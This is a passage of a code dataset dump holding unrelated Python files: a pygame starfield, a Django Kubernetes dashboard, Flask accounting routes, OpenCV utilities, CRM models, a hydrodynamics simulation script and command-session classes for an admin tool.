[window.width, random.randrange(window.height)]\n\n\ndef initialize_stars():\n \"\"\"Creates a new starfield.\"\"\"\n stars = []\n for x in range(NUMSTARS):\n star = init_star()\n stars.append(star)\n move_stars(stars)\n return stars\n\n\ndef draw_stars(surface, stars, color):\n \"\"\"Used to draw (and clear) the stars.\"\"\"\n for vel, pos in stars:\n pos = (int(pos[0]), int(pos[1]))\n surface.set_at(pos, color)\n\n\ndef move_stars(stars):\n \"\"\"Animate the star values.\"\"\"\n for vel, pos in stars:\n pos[0] = pos[0] + vel[0]\n pos[1] = pos[1] + vel[1]\n if not 0 <= pos[0] <= window.width:\n vel[:], pos[:] = init_star()\n\n\ndef test():\n \"\"\"Test for starfield.\"\"\"\n random.seed()\n stars = initialize_stars()\n clock = pygame.time.Clock()\n #initialize and prepare screen\n pygame.init()\n screen = pygame.display.set_mode(window)\n pygame.display.set_caption('Starfield test')\n screen.fill(SKY_COLOR)\n\n done = 0\n while not done:\n draw_stars(screen, stars, SKY_COLOR)\n move_stars(stars)\n draw_stars(screen, stars, STAR_COLOR)\n pygame.display.update()\n for e in pygame.event.get():\n if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE):\n done = 1\n break\n clock.tick(50)\n\nif __name__ == '__main__':\n test()\n\n\n","sub_path":"starfield.py","file_name":"starfield.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"74532212","text":"from django.shortcuts import render,redirect\nfrom django.http import JsonResponse\nfrom devops_k8s.k8s import auth_check, self_login_required, load_auth_config, dt_format\nimport hashlib, random\nfrom dashboard.models import User\nfrom kubernetes import client\nfrom dashboard import node_data\n\n@self_login_required\ndef index(request):\n auth_type = request.session.get(\"auth_type\")\n token = request.session.get(\"token\")\n load_auth_config(auth_type, token)\n core_api = client.CoreV1Api()\n\n # 命名空间:ajax从接口获取动态渲染\n # 
计算资源(echart):ajax从接口获取动态渲染\n # 存储资源:下面获取,模板渲染\n # 节点状态:下面获取,模板渲染\n\n node_resource = node_data.node_resource(core_api)\n pv_list = []\n for pv in core_api.list_persistent_volume().items:\n pv_name = pv.metadata.name\n capacity = pv.spec.capacity[\"storage\"] # 返回字典对象\n access_modes = pv.spec.access_modes\n reclaim_policy = pv.spec.persistent_volume_reclaim_policy\n status = pv.status.phase\n if pv.spec.claim_ref is not None:\n pvc_ns = pv.spec.claim_ref.namespace\n pvc_name = pv.spec.claim_ref.name\n claim = \"%s/%s\" %(pvc_ns,pvc_name)\n else:\n claim = \"未关联PVC\"\n storage_class = pv.spec.storage_class_name\n create_time = dt_format(pv.metadata.creation_timestamp)\n\n data = {\"pv_name\": pv_name, \"capacity\": capacity, \"access_modes\": access_modes,\n \"reclaim_policy\": reclaim_policy, \"status\": status,\n \"claim\": claim,\"storage_class\": storage_class,\"create_time\": create_time}\n pv_list.append(data)\n\n return render(request, 'index.html', {\"node_resource\": node_resource, \"pv_list\": pv_list})\n\n# 计算资源(echart)\ndef node_resource(request):\n auth_type = request.session.get(\"auth_type\")\n token = request.session.get(\"token\")\n load_auth_config(auth_type, token)\n core_api = client.CoreV1Api()\n\n res = node_data.node_resource(core_api)\n return JsonResponse(res)\n\ndef login(request):\n if request.method == 'POST':\n print(request.POST)\n # 处理token登录\n token = request.POST.get('token')\n if token: # 判断token是否为空\n # 判断token的可用性\n if auth_check(auth_type='token', token=token):\n request.session['is_login'] = True\n request.session['token'] = token\n request.session['auth_type'] = 'token'\n code = 0\n msg = \"登录成功\"\n else:\n code = 1\n msg = \"token无效\"\n else:\n # 处理kubeconfig登录\n file_obj = request.FILES.get('file')\n # 生成一个随机字符串(token), 保存到session, 用于��识登录用户\n token_random = hashlib.md5(str(random.random()).encode()).hexdigest()\n try:\n content = file_obj.read().decode() # bytes to str\n User.objects.create(\n auth_type='kubeconfig',\n 
token=token_random,\n content=content\n )\n except Exception as e:\n print(e)\n code = 1\n msg = \"文件类型错误\"\n if auth_check(auth_type='kubeconfig', token=token_random):\n request.session['is_login'] = True\n request.session['token'] = token_random\n request.session['auth_type'] = 'kubeconfig'\n code = 0\n msg = \"登录成功\"\n else:\n code = 1\n msg = \"kubeconfig文件无效\"\n result = {'code': code, 'msg': msg}\n return JsonResponse(result)\n return render(request, 'login.html')\n\ndef logout(request):\n request.session.flush()\n return redirect(login)\n\n@self_login_required\ndef export_resource_api(request):\n namespace = request.GET.get('namespace')\n resource = request.GET.get('resource')\n name = request.GET.get('name')\n\n # 认证相关\n auth_type = request.session.get('auth_type')\n token = request.session.get('token')\n load_auth_config(auth_type, token)\n\n core_api = client.CoreV1Api() # namespace,pod,service,pv,pvc\n apps_api = client.AppsV1Api() # deployment,daemonset,statefulset\n net_api = client.NetworkingV1beta1Api() # ingress\n storage_api = client.StorageV1Api() # storage_class\n\n import yaml,json\n\n yaml_str = \"\"\n if resource == 'deployment':\n try:\n res_str = apps_api.read_namespaced_deployment(name=name, namespace=namespace, _preload_content=False).read().decode() # byte -> str\n json_str = json.loads(res_str) # str -> json\n yaml_str = yaml.safe_dump(json_str) # json -> yaml\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'namespace':\n try:\n res_str = core_api.read_namespace(name=name, _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'persistentvolumes':\n try:\n res_str = core_api.read_persistent_volume(name=name, _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'pods':\n try:\n 
res_str = core_api.read_namespaced_pod(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'daemonset':\n try:\n res_str = apps_api.read_namespaced_daemon_set(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'statefulset':\n try:\n res_str = apps_api.read_namespaced_stateful_set(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'service':\n try:\n res_str = core_api.read_namespaced_service(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'ingress':\n try:\n res_str = net_api.read_namespaced_ingress(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'persistentvolumeclaim':\n try:\n res_str = core_api.read_namespaced_persistent_volume_claim(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'configmap':\n try:\n res_str = core_api.read_namespaced_config_map(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'secret':\n try:\n res_str = core_api.read_namespaced_secret(name=name, 
namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'node':\n try:\n res_str = core_api.read_node(name=name, _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'replicaset':\n try:\n res_str = apps_api.read_namespaced_replica_set(name=name, namespace=namespace, _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n else:\n code = 1\n msg = \"未配置%s资源类型!\"%(resource)\n\n code = 0\n msg = \"查看YAML成功!\"\n res = {\"code\":code,\"msg\":msg,\"data\":yaml_str}\n return JsonResponse(res)\n\nfrom django.views.decorators.clickjacking import xframe_options_sameorigin\n\n@self_login_required\n@xframe_options_sameorigin\ndef ace(request):\n namespace = request.GET.get('namespace')\n resource = request.GET.get('resource')\n name = request.GET.get('name')\n\n data = {}\n data['namespace'] = namespace\n data['resource'] = resource\n data['name'] = name\n\n return render(request, 'ace.html', {'data':data})","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560440546","text":"from flask import render_template, request, redirect, url_for, Blueprint\nfrom flask_wtf import Form\nfrom pacioli import app, db, forms, models\n\nconfigure_blueprint = Blueprint('configure', __name__,\ntemplate_folder='templates')\n\n@configure_blueprint.route('/')\ndef index():\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts')\ndef chart_of_accounts():\n classificationform = forms.NewClassification()\n accountform = forms.NewAccount()\n 
subaccountform = forms.NewSubAccount()\n elements = models.Elements.query.all()\n return render_template(\"chart_of_accounts.html\",\n elements=elements,\n classificationform=classificationform,\n accountform=accountform,\n subaccountform=subaccountform)\n\n@configure_blueprint.route('/ChartOfAccounts/AddClassification', methods=['POST','GET'])\ndef add_classification():\n if request.method == 'POST':\n form = request.form.copy().to_dict()\n name = form['classification']\n parent = form['classificationparent']\n parent = models.Elements.query.filter_by(id=parent).one()\n parent = parent.name\n classification = models.Classifications(name=name, parent=parent)\n db.session.add(classification)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/DeleteClassification/')\ndef delete_classification(classification):\n classification = models.Classifications \\\n .query \\\n .filter_by(name=classification) \\\n .first()\n db.session.delete(classification)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/AddAccount', methods=['POST','GET'])\ndef add_account():\n if request.method == 'POST':\n form = request.form.copy().to_dict()\n name = form['account']\n parent = form['accountparent']\n parent = models.Classifications \\\n .query \\\n .filter_by(id=parent) \\\n .one()\n parent = parent.name\n account = models.Accounts(name=name, parent=parent)\n db.session.add(account)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/DeleteAccount/')\ndef delete_account(account):\n account = models.Accounts.query.filter_by(name=account).first()\n db.session.delete(account)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/AddSubAccount', methods=['POST','GET'])\ndef 
add_subaccount():\n if request.method == 'POST':\n form = request.form.copy().to_dict()\n name = form['subaccount']\n parent = form['subaccountparent']\n parent = models.Accounts.query.filter_by(id=parent).one()\n parent = parent.name\n subaccount = models.Subaccounts(name=name, parent=parent)\n db.session.add(subaccount)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts/DeleteSubAccount/')\ndef delete_subaccount(subaccount):\n subaccount = models.Accounts.query.filter_by(name=subaccount).first()\n db.session.delete(subaccount)\n db.session.commit()\n return redirect(url_for('configure.chart_of_accounts'))\n","sub_path":"pacioli/configure/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"61248895","text":"from PIL import Image, ImagePalette\nimport cv2\nimport numpy as np\nimport pathlib\nfrom itertools import combinations\n\n\ndef get_parent_dir_path() -> str:\n return pathlib.Path(__file__).parent.parent.absolute()\n\n\ndef sort_points(points):\n center = np.mean(points, axis=0)\n\n tl_cond = np.logical_and(points[:, 0] <= center[0], points[:, 1] <= center[1])\n tl = points[tl_cond]\n tr_cond = np.logical_and(points[:, 0] > center[0], points[:, 1] <= center[1])\n tr = points[tr_cond]\n br_cond = np.logical_and(points[:, 0] > center[0], points[:, 1] > center[1])\n br = points[br_cond]\n bl_cond = np.logical_and(points[:, 0] <= center[0], points[:, 1] > center[1])\n bl = points[bl_cond]\n\n return np.vstack([tl, tr, br, bl])\n\n\ndef get_4points_with_highest_area(points):\n if len(points) < 4:\n return []\n\n if len(points) == 4:\n return points\n\n max_combination = []\n max_area = 0\n\n for i in combinations(points, 4):\n area = cv2.contourArea(np.array(i))\n\n if max_area < area:\n max_combination = i\n max_area = area\n\n return 
max_combination\n\ndef is_shape_inside_shape(shape1, shape2):\n for point in shape1:\n if cv2.pointPolygonTest(np.array(shape2), tuple(point), False) < 0:\n return False\n\n return True\n\nclass BBObject:\n points = []\n center = ()\n\n def __init__(self, points):\n self.center = get_center(points)\n self.points = points\n self.original_points = points\n\n def set_points(self, points):\n self.points = points\n self.center = get_center(points)\n\n def get_points(self):\n return self.points\n\n# it returns list of numpy arrays with object coordinates\n# One object has 4 points, every point has two coordinates\ndef get_object_coordinates(segment_frame):\n contours, _ = cv2.findContours(cv2.cvtColor(segment_frame, cv2.COLOR_RGB2GRAY)[:, :].astype(np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n result = []\n\n def getApprox(contour, alpha):\n epsilon = alpha * cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, epsilon, True)\n return approx\n\n for contour in contours:\n corner_points = getApprox(contour, 0.01)\n points = np.float32(list(map(lambda x: x[0], corner_points)))\n\n try:\n for point in points:\n cv2.circle(segment_frame, tuple(point), 20, (255, 150, 20), 10)\n except:\n pass\n\n points = get_4points_with_highest_area(points)\n points = sort_points(np.array(points))\n\n if len(points) == 4:\n result.append(points)\n\n for comb in combinations(list(range(len(result))), 2) :\n shape1 = result[comb[0]]\n shape2 = result[comb[1]]\n\n if len(shape1) == 0 or len(shape2) == 0:\n continue\n\n if is_shape_inside_shape(shape1, shape2):\n result[comb[0]] = []\n elif is_shape_inside_shape(shape2, shape1):\n result[comb[1]] = []\n\n final_result = []\n\n for i in result:\n if len(i) > 0:\n final_result.append(BBObject(i))\n\n return final_result\n\n\ndef optimize_keypoint(src, src_prev, kp=None, match_count=None):\n match_count = match_count or 20\n detector = cv2.ORB_create()\n print(\"detector\")\n # Detect the keypoints using ORB Detector, compute 
the descriptors\n src_kp, des1 = detector.detectAndCompute(src, None)\n prev_kp, des2 = detector.detectAndCompute(src_prev, None)\n # print('k, d', kp1, des1)\n # if kp:\n # kp2, des2 = kp.get(\"kp\"), kp.get(\"des\")\n # src_kp, prev_kp = kp.get(\"src\"), kp.get(\"previous\")\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n # matcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_FLANNBASED)\n # matches = matcher.knnMatch(des1, des2, 2)\n matches = matcher.match(des1, des2)\n print(len(matches))\n # matcher = cv2.BFMatcher()\n # matches = matcher.match(src_kp, trans_kp)\n\n # # -- Filter matches using the Lowe's ratio test\n # ratio_thresh = 0.7\n # good_matches = []\n # for m, n in matches:\n # if m.distance < ratio_thresh * n.distance:\n # good_matches.append(m)\n # -- Draw matches\n img_matches = np.empty((max(src.shape[0], src_prev.shape[0]), src.shape[1] + src_prev.shape[1], 3), dtype=np.uint8)\n # final_img = cv2.drawMatches(src, src_kp, src_prev, prev_kp, good_matches, img_matches,\n # flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n\n final_img = cv2.drawMatches(src, src_kp, src_prev, prev_kp, matches[:match_count], img_matches)\n\n return final_img\n\n\ndef stabilise_transformation(src, src_prev):\n brows, bcols = src_prev.shape[:2]\n dst = cv2.addWeighted(src, 0.3, src_prev, 0.7, 0)\n rows, cols, channels = src.shape\n src[int(brows / 2) - int(rows / 2):int(brows / 2) + int(rows / 2),\n int(bcols / 2) - int(cols / 2):int(bcols / 2) + int(cols / 2)] = dst\n cv2.normalize(src, dst, 0, 1, cv2.NORM_L1, -1)\n return src\n\n\ndef generate_result_frame(frame, frame_index, replacement, objects):\n target_height, target_width, _ = replacement.shape\n\n counter = 0\n for global_obj_index in objects:\n global_obj = objects[global_obj_index]\n coords = global_obj.get_frame_coords(frame_index)\n if coords is None:\n continue\n\n original_coordinates = sort_points(np.array([[0, 0], [target_width, 0], [target_width, target_height], [0, 
target_height]], np.float32))\n object = sort_points(np.array(coords.points, np.float32))\n\n transformation = cv2.getPerspectiveTransform(original_coordinates, object)\n\n transformed = cv2.warpPerspective(replacement, transformation, (frame.shape[1], frame.shape[0]))\n transformed = enhance_colors(frame, transformed)\n\n cv2.fillConvexPoly(frame, sort_points(object.astype(int)), 0, 16)\n\n frame = frame + transformed\n\n # DEbug\n # cv2.putText(frame, f'ID{global_obj_index}', tuple(coords.center), cv2.FONT_HERSHEY_SIMPLEX, 1,\n # (0, 255, 255), 2, cv2.LINE_AA, False)\n #\n # for i in coords.points:\n # cv2.circle(frame, tuple(i), 10, (0, 0, 0), 6)\n #\n # if global_obj.get_frame_coords(frame_index-1) is not None:\n # for i in global_obj.get_frame_coords(frame_index-1).original_points:\n # cv2.circle(frame, tuple(i), 3, (255, 0, 0), 3)\n #\n # for i in coords.original_points:\n # cv2.circle(frame, tuple(i), 5, (0, 255, 0), 3)\n\n # if global_obj.get_frame_coords(frame_index + 1) is not None:\n # for i in global_obj.get_frame_coords(frame_index+1).original_points:\n # cv2.circle(frame, tuple(i), 7, (0, 0, 255), 3)\n # Debug\n\n counter += 1\n\n return frame\n\n\n# Adjust coordinates of objects:\n# position correcation, smoothing\ndef adjust_coordinates(object_coordinates) -> np.ndarray:\n return object_coordinates\n\n\ndef enhance_colors(parent, injection):\n # aug = Compose([FDA([parent], p=1, read_fn=lambda x: x)])\n # result = aug(image=injection)['image']\n #\n # cv2.imshow('img', result)\n return injection\n\n\ndef get_center(points):\n return np.mean(np.array(points), axis=0)\n\ndef blur_transformed(src, kernel=(4, 4), transformation=None, with_edge=False):\n # Create ROI coordinates\n # x, y = 0, 0\n # w, h = int(src.shape[1]), int(src.shape[0])\n # blur_gaus = cv2.GaussianBlur(cv2.rectangle(src, (1, 1), (src.shape[1]-1, src.shape[0]-1), (150, 150, 150), 2), (9, 9), 0)\n #\n # # Insert ROI back into image\n # src[y:y + h, x:x + w] = blur\n #\n if 
with_edge:\n cv2.rectangle(src, (1, 1), (src.shape[1]-1, src.shape[0]-1), (150, 150, 150), 2)\n blur = cv2.filter2D(src, -1, np.ones(kernel, np.float32) / 18)\n return blur\n","sub_path":"cvas/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"181304152","text":"\"\"\"\nQuestion 019 - Level 03\nYou are required to write a program to sort the (name, age, height) tuples by ascending where name is string, age and\nheight are numbers. The tuples are input by console. The sort criteria is:\n1. Sort based on name;\n2. Then sort based on age;\n3. Then sort by score.\nThe priority is that name > age > score.\nIf the following tuples are given as input to program:\nTom,18,80\nJohn,20,90\nJony,17,91\nJony,17,93\nJson,21,85\nThen, the output of the program should be:\n[('John', '20, '90'), ('Jony', '17', '91'), ('Jony', '17', '93'), ('Json', '21', '85'), ('Tom', '19', '80')]\nHints: In case of input data being supplied to the question, it should be assumed to be a console input.\nWe use itemgetter to enable multiple sort keys.\n--- Nguyen Van Duc ---\n\"\"\"\nfrom operator import itemgetter, attrgetter\n\nl = []\nwhile True:\n s = input(\"Enter values: \")\n if not s:\n break\n l.append(tuple(s.split(\",\")))\n\nl.sort(key=itemgetter(0, 1, 2))\nprint(l)\n","sub_path":"101 Tasks/Task 019.py","file_name":"Task 019.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"16179631","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom phonenumber_field.modelfields import PhoneNumberField\n\n# from projecten.models import Verkoopkans\n\n\"\"\"\nAbstracte class voor het toevoegen van time stamp op de modellen.\n\"\"\"\nclass TransactionDT(models.Model):\n \"\"\"\n Opnemen in (vrijwel) iedere class.\n \"\"\"\n created_dt = 
models.DateTimeField(auto_now_add=True, null=True)\n modified_dt = models.DateTimeField(auto_now=True, null=True)\n last_modified_user = models.ForeignKey('auth.User',\n verbose_name='Laatst gewijzigd door',\n null=True,\n blank=True,\n on_delete=models.CASCADE\n )\n\n class Meta:\n abstract = True\n\nclass Branche(TransactionDT):\n branch = models.CharField(max_length=80, unique=True)\n\n class Meta:\n ordering = ['branch']\n verbose_name_plural = 'Branches'\n\n def __unicode__(self):\n return self.branch\n\n def __str__(self):\n return self.branch\n\nclass Relatietype(TransactionDT):\n relatietype = models.CharField(max_length=80, unique=True)\n\n class Meta:\n ordering = ['relatietype']\n verbose_name_plural = 'Relatietypen'\n\n def __unicode__(self):\n return self.relatietype\n\n def __str__(self):\n return self.relatietype\n\nclass Bedrijf(TransactionDT):\n bedrijfsnaam = models.CharField(max_length=120, unique=True)\n telefoonnummer = PhoneNumberField(blank=True, null=True)\n branche = models.ForeignKey(Branche, blank=False, null=False, on_delete=models.CASCADE)\n relatietype = models.ForeignKey(Relatietype, blank=True, null=True, on_delete=models.CASCADE)\n email = models.EmailField(max_length=75, blank=True, null=True)\n website = models.URLField(max_length=200, blank=True, null=True)\n kvk_nummer = models.CharField(max_length=20, blank=True, null=True)\n onenote = models.URLField(max_length=400, blank=True, null=True)\n actief = models.BooleanField(default=True)\n klantpartner = models.ForeignKey(User, verbose_name=\"Relatiemanager\", related_name='Klantpartner', blank=True, null=True, on_delete=models.CASCADE, limit_choices_to={'is_active': True})\n\n class Meta:\n ordering = ['bedrijfsnaam']\n verbose_name_plural = 'Bedrijven'\n\n def __unicode__(self):\n return self.bedrijfsnaam\n\n def __str__(self):\n return self.bedrijfsnaam\n\nclass Adres(TransactionDT):\n ADRESTYPE_CHOICES = (\n ('P', 'Postadres'),\n ('B', 'Bezoekadres')\n )\n\n bedrijf = 
models.ForeignKey(Bedrijf, blank=True, null=True, on_delete=models.CASCADE)\n adrestype = models.CharField(max_length=1, choices=ADRESTYPE_CHOICES, null=False, blank=False)\n adresregel_1 = models.CharField(max_length=80, null=True)\n adresregel_2 = models.CharField(max_length=80, blank=True, null=True)\n postcode = models.CharField(max_length=7, null=True)\n plaats = models.CharField(max_length=80, null=True)\n Land = models.CharField(max_length=80, blank=True, null=True)\n\n class Meta:\n verbose_name_plural = 'Adressen'\n\n def __unicode__(self):\n return self.adresregel_1 + ', ' + self.postcode + ' ' + self.plaats\n\n def __str__(self):\n return self.adresregel_1 + ', ' + self.postcode + ' ' + self.plaats\n\nclass Contactpersoon(TransactionDT):\n GENDER_CHOICES = (\n ('M', 'Man'),\n ('V', 'Vrouw'),\n ('O', 'Onbekend')\n )\n\n volledige_naam = models.CharField(max_length=120)\n title = models.CharField(verbose_name='titel', max_length=10, blank=True, null=True)\n initialen = models.CharField(max_length=20, blank=True, null=True)\n voornaam = models.CharField(max_length=120, blank=True, null=True)\n tussenvoegsel = models.CharField(max_length=120, blank=True, null=True)\n achternaam = models.CharField(max_length=120, blank=True, null=True)\n telefoonnummer = PhoneNumberField(blank=True, null=True)\n mobielnummer = PhoneNumberField(blank=True, null=True)\n email = models.EmailField(max_length=75, blank=True, null=True)\n bedrijf = models.ForeignKey(Bedrijf, blank=True, null=True, on_delete=models.CASCADE)\n standplaats = models.ForeignKey(Adres, blank=True, null=True, on_delete=models.CASCADE)\n functie = models.CharField(max_length=120, blank=True, null=True)\n afdeling = models.CharField(max_length=120, blank=True, null=True)\n assistent = models.CharField(max_length=120, blank=True, null=True)\n manager = models.CharField(max_length=120, blank=True, null=True)\n overige_contactgegevens = models.CharField(max_length=120, blank=True, null=True)\n onenote = 
models.URLField(max_length=400, blank=True, null=True)\n nieuwsbrief = models.BooleanField(default=False)\n actief = models.BooleanField(default=True)\n sexe = models.CharField('geslacht', max_length=1, choices=GENDER_CHOICES, default='O', null=False, blank=False)\n klantpartner = models.ForeignKey(User, verbose_name=\"Relatiemanager\", related_name='Relatiemanager', blank=True, null=True, on_delete=models.CASCADE, limit_choices_to={'is_active': True})\n\n class Meta:\n ordering = ['volledige_naam']\n verbose_name_plural = 'Contactpersonen'\n\n def __unicode__(self):\n return self.volledige_naam\n\n def __str__(self):\n return self.volledige_naam \n\n","sub_path":"crm/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"374323091","text":"import phd\nimport numpy as np\n\ndef create_particles(gamma):\n\n Lx = 1. # domain size in x\n nx = 50 # particles per dim\n n = nx*nx*nx # number of points\n\n # create particle container\n pc = phd.ParticleContainer(n, dim=3)\n\n part = 0\n np.random.seed(0)\n for i in range(nx):\n for j in range(nx):\n for k in range(nx):\n pc['position-x'][part] = np.random.rand()\n pc['position-y'][part] = np.random.rand()\n pc['position-z'][part] = np.random.rand()\n pc['ids'][part] = part\n part += 1\n\n # set ambient values\n pc['density'][:] = 1.0 # density\n pc['pressure'][:] = 1.0E-5*(gamma-1) # total energy\n\n # put all enegery in center particle\n r = 0.1\n cells = ( (pc['position-x']-.5)**2\\\n + (pc['position-y']-.5)**2\\\n + (pc['position-z']-.5)**2 ) <= r**2\n pc['pressure'][cells] = 1.0/(4.0*np.pi*r**3/3.)*(gamma-1)\n\n # zero out the velocities and set particle type\n pc['velocity-x'][:] = 0.0\n pc['velocity-y'][:] = 0.0\n pc['velocity-z'][:] = 0.0\n pc['tag'][:] = phd.ParticleTAGS.Real\n pc['type'][:] = phd.ParticleTAGS.Undefined\n\n return pc\n\n# create inital state of the simulation\npc = 
create_particles(1.4)\n\ndomain = phd.DomainLimits(dim=3, xmin=0., xmax=1.) # spatial size of problem \nboundary = phd.Boundary(domain, # reflective boundary condition\n boundary_type=phd.BoundaryType.Reflective)\nmesh = phd.Mesh(boundary) # tesselation algorithm\nreconstruction = phd.PieceWiseConstant() # constant reconstruction\nriemann = phd.HLL(reconstruction, gamma=1.4) # riemann solver\nintegrator = phd.MovingMesh(pc, mesh, riemann, regularize=1) # integrator \nsolver = phd.Solver(integrator, # simulation driver\n cfl=0.5, tf=0.1, pfreq=1,\n relax_num_iterations=8,\n output_relax=False,\n fname='sedov_3d_uniform')\nsolver.solve()\n","sub_path":"test_suite/sedov/3d/single_core/uniform/sedov_3d_uniform.py","file_name":"sedov_3d_uniform.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"486953846","text":"# -*- coding: utf-8 -*-\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom minke.sessions import CommandFormSession\nfrom minke.sessions import SingleCommandSession\nfrom minke.sessions import CommandChainSession\nfrom minke.sessions import REGISTRY\nfrom minke.models import Host\nfrom .forms import CommandForm\nfrom .models import Command\nfrom .models import CommandGroup\n\n\nclass BaseCommandSession(SingleCommandSession):\n abstract = True\n model = None\n model_id = None\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n obj = self.model.objects.get(pk=self.model_id)\n self.command = obj.cmd\n\n\nclass BaseCommandChainSession(CommandChainSession):\n abstract = True\n model = None\n model_id = None\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n obj = self.model.objects.get(pk=self.model_id)\n self.commands = (c.cmd for c in obj.commands.all())\n\n\nclass BaseCommandChoiceSession(CommandFormSession):\n abstract = True\n form = CommandForm\n model = None\n model_id = None\n\n 
@classmethod\n def get_form(cls):\n obj = cls.model.objects.get(pk=cls.model_id)\n cmds = obj.get_commands()\n cls.form.base_fields['cmd'].choices = ((c.id, str(c)) for c in cmds)\n return cls.form\n\n def format_cmd(self, cmd):\n cmd_obj = Command.objects.get(pk=self.data['cmd'])\n return super().format_cmd(cmd_obj.cmd)\n\n\ndef session_factory():\n def build_attrs(obj):\n attrs = dict()\n attrs['model'] = obj.__class__\n attrs['model_id'] = obj.id\n attrs['verbose_name'] = obj.label\n attrs['__doc__'] = obj.description\n attrs['work_on'] = tuple((ct.model_class() for ct in obj.minketypes.all()))\n return attrs\n\n objs = Command.objects.filter(active=True)\n for obj in objs:\n attrs = build_attrs(obj)\n attrs['command'] = obj.cmd\n cls_name = '%s_%d' % (Command.__name__, obj.id)\n type(cls_name, (BaseCommandSession,), attrs)\n\n objs = CommandGroup.objects.filter(active=True, as_options=False)\n for obj in objs:\n attrs = build_attrs(obj)\n attrs['commands'] = tuple((c for c in obj.get_commands().all()))\n cls_name = '%s_%d' % (CommandGroup.__name__, obj.id)\n type(cls_name, (BaseCommandChainSession,), attrs)\n\n objs = CommandGroup.objects.filter(active=True, as_options=True)\n for obj in objs:\n attrs = build_attrs(obj)\n cls_name = '%s_%d' % (CommandGroup.__name__, obj.id)\n type(cls_name, (BaseCommandChoiceSession,), attrs)\n\n\nREGISTRY.add_session_factory(session_factory)\n","sub_path":"minke/contrib/commands/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"68065854","text":"\"\"\"Second Migration\n\nRevision ID: 312c8ab46c53\nRevises: c5e23052bcc5\nCreate Date: 2018-09-13 11:36:40.773452\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '312c8ab46c53'\ndown_revision = 'c5e23052bcc5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### 
